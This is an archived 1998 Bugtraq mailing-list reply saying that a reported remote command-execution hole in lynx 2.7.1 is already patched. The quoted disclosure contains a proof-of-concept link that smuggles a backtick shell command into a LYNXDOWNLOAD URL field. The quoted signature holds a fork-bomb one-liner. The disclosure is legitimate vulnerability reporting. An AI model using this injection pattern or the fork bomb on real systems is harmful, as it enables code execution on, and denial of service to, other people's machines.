[6332] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Very, very ugly remote lynx 2.7.1 hole

daemon@ATHENA.MIT.EDU (Lumpy Lynx)
Wed Mar 18 15:37:14 1998

Date: 	Tue, 17 Mar 1998 11:59:17 -0500
Reply-To: dynamo@IME.NET
From: Lumpy Lynx <dynamo@IME.NET>
X-To:         Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.3.96.980317162323.17528A-100000@genome>

i believe its fixed by fotemods.
you might want to see if its still vulnerable with hist most recent
patches.  also read the vendor bulletin on cert.org

ftp://ftp.cert.org/pub/cert_bulletins/VB-97.06.lynx

also there is discussion of this if you search the bugtraq archives.

dynamo

On Tue, 17 Mar 1998, Michal Zalewski wrote:

> While poking around lynx protocol handling routines, I found this very
> big, ugly remote hole:
>
> <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
> CLICK HERE
> </a>
>
> It allows remote execution of any code on viewer's machine. Also, by
> setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
> exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
> also not funny.
>
> Greetings,
> _______________________________________________________________________
> Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
>

home help back first fref pref prev next nref lref last post